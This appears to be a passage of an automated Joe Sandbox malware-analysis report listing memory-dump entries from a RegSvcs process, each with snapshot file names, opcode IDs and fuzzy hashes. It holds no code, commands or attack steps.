                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 823b5f8e03b011fbf077edf85f841450b49c27da9f914b1b1d54ce9fe9559f90
                                                                                              • Instruction ID: 5eef829056fe421326a6c8925506dbdbf102860bfebb6c04c317d3f61038f6ad
                                                                                              • Opcode Fuzzy Hash: 823b5f8e03b011fbf077edf85f841450b49c27da9f914b1b1d54ce9fe9559f90
                                                                                              • Instruction Fuzzy Hash: 7F01C875746648EBF317626D9C88F6B7BDCEF40354F0500B5F9828B291D954DD00C361
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4bfbbac6f43353fcdcc377d72b7e830fa7c2307a2846508499bdef6f9652816c
                                                                                              • Instruction ID: 2744fdf3de8a783e33af7c1978c5923bf7ba498e5293670718d24681beb23ba0
                                                                                              • Opcode Fuzzy Hash: 4bfbbac6f43353fcdcc377d72b7e830fa7c2307a2846508499bdef6f9652816c
                                                                                              • Instruction Fuzzy Hash: B611AC36644684AFCB25CF5AD880B567BA9EB86B64F10411AF954CB290C774FC40EFA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a820227721fbbc3f2f1ac1f96c941e4229b4b813f3b6f61c80b18610c0a81868
                                                                                              • Instruction ID: 8c4c635dbd10a31aa91daf343c937b24b74986865464f5eae204d085c1de503f
                                                                                              • Opcode Fuzzy Hash: a820227721fbbc3f2f1ac1f96c941e4229b4b813f3b6f61c80b18610c0a81868
                                                                                              • Instruction Fuzzy Hash: 2C11C272A00715AFDB21DF99CD80B5EFBF8EF88740F510894EA41B7205D77AAD018B50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bd2e2b88fddac1b3f95355a1cfbfa8a5f905ea5854c6d2a256c3459e067183b9
                                                                                              • Instruction ID: 6b05e349cbd77e9d65e1f14f376253647d7ce4b7cae7eb55c74a2ae7ddae4cbf
                                                                                              • Opcode Fuzzy Hash: bd2e2b88fddac1b3f95355a1cfbfa8a5f905ea5854c6d2a256c3459e067183b9
                                                                                              • Instruction Fuzzy Hash: 4A01F5716012099FD726DF19D904F56BBF9FB86314F2085AAF5449B2A1CB74EC82CB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                              • Instruction ID: f066a6f41e182ffb9a8da8cfa45e60d894f03b49f2875ba5610e52a77e8f51f3
                                                                                              • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                              • Instruction Fuzzy Hash: C611E5B22016C69BF723972CC994B297BD4AF00748F1908F0EEC1A7693F729C842C250
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                              • Instruction ID: 7c0adc2f05dfa2a6b524a9a7ac8ab292df4d9558b4f89b1b11ccea2ce09c7169
                                                                                              • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                              • Instruction Fuzzy Hash: F701C03A600305AFEB21DB59CC00B9A7AEDFF40B50F158065FA859B260E779DD40D790
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                              • Instruction ID: a00f362ec6bd6c488375a9ffa8d06bf3cd0bcf0c831c86dd584a269707fe9f6a
                                                                                              • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                              • Instruction Fuzzy Hash: F2012632904B119BCB308F16D840A367BE6EF55B71708892EFC958B780C331D800EB65
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a2c827c19edb2fec9c2d8dda169cfaaac8ff77bbf8f0ba735af89c78f9c26699
                                                                                              • Instruction ID: 22683632c940f859fe314e4301a8117d3524dd91a9894d020ee53c210b0448a4
                                                                                              • Opcode Fuzzy Hash: a2c827c19edb2fec9c2d8dda169cfaaac8ff77bbf8f0ba735af89c78f9c26699
                                                                                              • Instruction Fuzzy Hash: 8211A131241640EFDB66EF19DD91F56BBB8FF44B84F1000A5FD459B6A1C635EE01CA90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 51403c177500f9986afdbf61155dba9c9fa0cc18077e3ee10aa97eb75b56335a
                                                                                              • Instruction ID: 87b25ad20a4d95bff14bc4b73596efe684b8f9383b458f64ce8d6670afa657ee
                                                                                              • Opcode Fuzzy Hash: 51403c177500f9986afdbf61155dba9c9fa0cc18077e3ee10aa97eb75b56335a
                                                                                              • Instruction Fuzzy Hash: BC115A7194122DABDF26AB64CD52FE9B2B4AF18710F5041D4A358E60E0DA709E81DF84
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                              • Instruction ID: 1aaad8a58f5e8de36bc0e621882e7d9c386a6a4adfdba8b8c254a93f90a79af5
                                                                                              • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                              • Instruction Fuzzy Hash: 67014C33A001418BDF558E5ADC80FA2776EBFC4710F1544A5EE41CF296EA71CC81E390
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9856be460b98d6679beb2ba7cd457a6470b471dbd0f9af7f545664f8026cd3ef
                                                                                              • Instruction ID: 43163bfb6bcbefe46995a7f34e8ff64f96e6e9f13dccf31f257d518aea7f0b08
                                                                                              • Opcode Fuzzy Hash: 9856be460b98d6679beb2ba7cd457a6470b471dbd0f9af7f545664f8026cd3ef
                                                                                              • Instruction Fuzzy Hash: 6811177290001DABCB15DB94CC80DEFBBBCEF48254F044166E906E7211EA35AA15CBA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c0b896dbbdb1e43d8de955df1c6a8d578b8c6dcbc511ec641e31c10e88dd2d77
                                                                                              • Instruction ID: 0761d101bad4bf84fe0be0c4498167ebbe3e2275d0d1fdff4552a8a234bc1b1c
                                                                                              • Opcode Fuzzy Hash: c0b896dbbdb1e43d8de955df1c6a8d578b8c6dcbc511ec641e31c10e88dd2d77
                                                                                              • Instruction Fuzzy Hash: 4011C832A445459FD711CF58D800BA5BBF5FF5A314F088199E985CB315D732EC81DBA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: cdf7c8f2e80cf02010e73acc9facd749b98fae116f0440f66c1ff13a53ca0653
                                                                                              • Instruction ID: be47523ff7f4bd079da90cde39a6caa75da7d1dfefbb9b5a7b941c32bb5e0868
                                                                                              • Opcode Fuzzy Hash: cdf7c8f2e80cf02010e73acc9facd749b98fae116f0440f66c1ff13a53ca0653
                                                                                              • Instruction Fuzzy Hash: FE01F2B1244B00AFD3316B19D801F1BBAA8EF44B50F11042AF7CA8F3A0C6B598408B54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 82420004ac682059f53ab145607c65328a65bd85c2dfe3615e412f5ca44d9619
                                                                                              • Instruction ID: 4f0a85801e28b88c50b68ee2143195713306e5ebd1d3dfb40b44457bc896e626
                                                                                              • Opcode Fuzzy Hash: 82420004ac682059f53ab145607c65328a65bd85c2dfe3615e412f5ca44d9619
                                                                                              • Instruction Fuzzy Hash: 5EF0F433A41B64B7C7319B5B8D45F17BAAEEF84BA0F154028B60597650DA34ED01EAA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                              • Instruction ID: 8c7b6589bbae6f3707644e522feb23ba59154c412da9bb9064c47949202d7208
                                                                                              • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                              • Instruction Fuzzy Hash: 2CF0C8B2600615ABE325CF4DDD41E57FBEADFC1A80F048268F655C7220E631DD04CB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                              • Instruction ID: abcbb4f83cc7df941ac2299f0406dbedf734303ffbea61d493b611e815ec873d
                                                                                              • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                              • Instruction Fuzzy Hash: 1CF0F673658A239BC73316598C40B6BB69B8FC1B64F2E4037F209DB344CA648C02F6D0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                              • Instruction ID: 7be6bc654c873bf6575738dfe566db1870539426e130eeeabe4ba9a8901f1f90
                                                                                              • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                              • Instruction Fuzzy Hash: 9A0181322406899BE363965EC905B5ABFD8EF41758F0980A6FE848B6A2DA79C900C651
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 03c480bca9c794ad1cf46968a3796549179f25923f9a64b9994f29d8855f476a
                                                                                              • Instruction ID: c157a0e39f34c0bbd980c227bafeea42ca1b8edccc726de2e9c3c8b46a039df0
                                                                                              • Opcode Fuzzy Hash: 03c480bca9c794ad1cf46968a3796549179f25923f9a64b9994f29d8855f476a
                                                                                              • Instruction Fuzzy Hash: FD017171A0025D9FDB00DFA9D441AEEBBF4AF48310F144059F540A7380D778EA01CB54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                              • Instruction ID: 8dec4113df36827c642b9b1826ce3528c097adffdbecfea078ee8c8be920fe77
                                                                                              • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                              • Instruction Fuzzy Hash: 1DE0C2343003168FE755CF19C044B627BFABFD5A10F28C0A8A9888F305EB32E842CB40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b8acc17bb811890d4302042926220155de4a5f7b56cb69a25bf0c832bee970b7
                                                                                              • Instruction ID: 2f979d52912697403ab17f1c27f755422d45ce14be666fe0a91b366d0ade0dd2
                                                                                              • Opcode Fuzzy Hash: b8acc17bb811890d4302042926220155de4a5f7b56cb69a25bf0c832bee970b7
                                                                                              • Instruction Fuzzy Hash: 01D02E334C20306AEB77F228BE04FE33A99AB40764F0648A0F688E2029D52CCC8192C4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                              • Instruction ID: ccef759ff80ddaf180881dc03d44399ef3835888af36fabb7d8fb273750055f1
                                                                                              • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                              • Instruction Fuzzy Hash: 3BE0CD32500520DFDB322F15DC01F5176E6FF64B51F25485AF0C1161A48B745C82FB44
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e11a57143702242364d2b83303e293bdba6231e0197df2e73aa18f92c330474f
                                                                                              • Instruction ID: da88e2a90561cbb58d8d169665f2532ffc4f8ecf60800ad91f8af6f7bfa8d08b
                                                                                              • Opcode Fuzzy Hash: e11a57143702242364d2b83303e293bdba6231e0197df2e73aa18f92c330474f
                                                                                              • Instruction Fuzzy Hash: 30E07D31051630DEDB316F02ED00F5276F6BF50750F14442AF042055B0CF74AC82F650
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e7ef62cfab6c6df14981b91fa009786d871e03efaa1ff0e129f96acda6e14cdc
                                                                                              • Instruction ID: d8101e7e8bfede622f20139d518ae5228f9a21a7fd0b37c264eea58f57058f65
                                                                                              • Opcode Fuzzy Hash: e7ef62cfab6c6df14981b91fa009786d871e03efaa1ff0e129f96acda6e14cdc
                                                                                              • Instruction Fuzzy Hash: 09E08C321004946BC611FA5EED12E5A739EEF94360F010225B150972A1CA29BD00D794
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                              • Instruction ID: 3955de86e663fe53303fbe44addf806ed2e6414fd0bb88293782af2dd9799652
                                                                                              • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                              • Instruction Fuzzy Hash: 74E08633111A1487D728DE18D511B7677E4EF45720F09863EA65347784C634E644C794
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                              • Instruction ID: 7d070f8408e737dbffcb608b93d4c00577b6abef139a684db1f2ddfca17c6532
                                                                                              • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                              • Instruction Fuzzy Hash: ECD05E36511A50AFC7329F1BEE00C13BBF9FFC4B10706066EA54583920C671A906DBA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                              • Instruction ID: 5b492bffab929dea0a8ec6037eeb5ad44dc233302300b1ab1b034284402006d0
                                                                                              • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                              • Instruction Fuzzy Hash: 65D0A932204620ABDBB2AA1CFC00FD333E8AB88760F060499B008C7061C364AC81CA84
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                              • Instruction ID: bec390ab46fb634e04cb35dc0b2adf515200db7a45b77998b8525998d4743ce5
                                                                                              • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                              • Instruction Fuzzy Hash: DCE0EC35950684ABDF92DF59DA40F5AFBF5BB84B40F150494A5886B661C628AA00DB40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                              • Instruction ID: c6ead05cba39c75d8448e606fb4acc1192f43838320a3fa78564736135a0ff7c
                                                                                              • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                              • Instruction Fuzzy Hash: 72D0223321603093CF2856606C14F6379069F80BA0F1E006E340AA3A00C0088C42F6E4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                              • Instruction ID: 6ac73228a0e003d8b7eefea19a62c965dd8ba1ce5cbcd67ca8801ea6034f8b26
                                                                                              • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                              • Instruction Fuzzy Hash: 01D012371D054DBBCB119F65DC02FA57BA9EB54BA0F454020B604875A1C63AE950D584
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 048bd85ddacb95df16fd169dad6b4422a6be0539bdc263fa181526f1fc5a32c3
                                                                                              • Instruction ID: d843a8b62e1558cd90113e8949baf077d744d6ff147f52c80ade7c341c16ec3b
                                                                                              • Opcode Fuzzy Hash: 048bd85ddacb95df16fd169dad6b4422a6be0539bdc263fa181526f1fc5a32c3
                                                                                              • Instruction Fuzzy Hash: 46D05E315450418BEF57CB09CA1492E3AB0FB04640B8000A8EFC051020D72ED801CA00
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                              • Instruction ID: e2b8565b1b29974c669f97b42b4cc57f6fdef9e5d7796cc862703e2d82446e5c
                                                                                              • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                              • Instruction Fuzzy Hash: FED0C975652E84CFC71ACB0CC5A8B2533A4FF44B44F8504E0E541CBB32DA2CDD40CA10
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                              • Instruction ID: 288df94414747e0f3ea600a2fbf54c75209c999922a2e63ad1d59faf98d3a176
                                                                                              • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                              • Instruction Fuzzy Hash: 47C08C33290648AFCB12EF98DD02F127BE9EB98B40F010061F3048B671C635FD20EA84
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                              • Instruction ID: fa2dc1c3df4c8347b6fe0c25406f2ccc7458cef33b62c3b329888632b65876c5
                                                                                              • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                              • Instruction Fuzzy Hash: 0BD01236100248EFCB02DF41C890E9A772AFBD8750F108019FD1907650CA31ED62DA50
                                                                                              Memory Dump Source
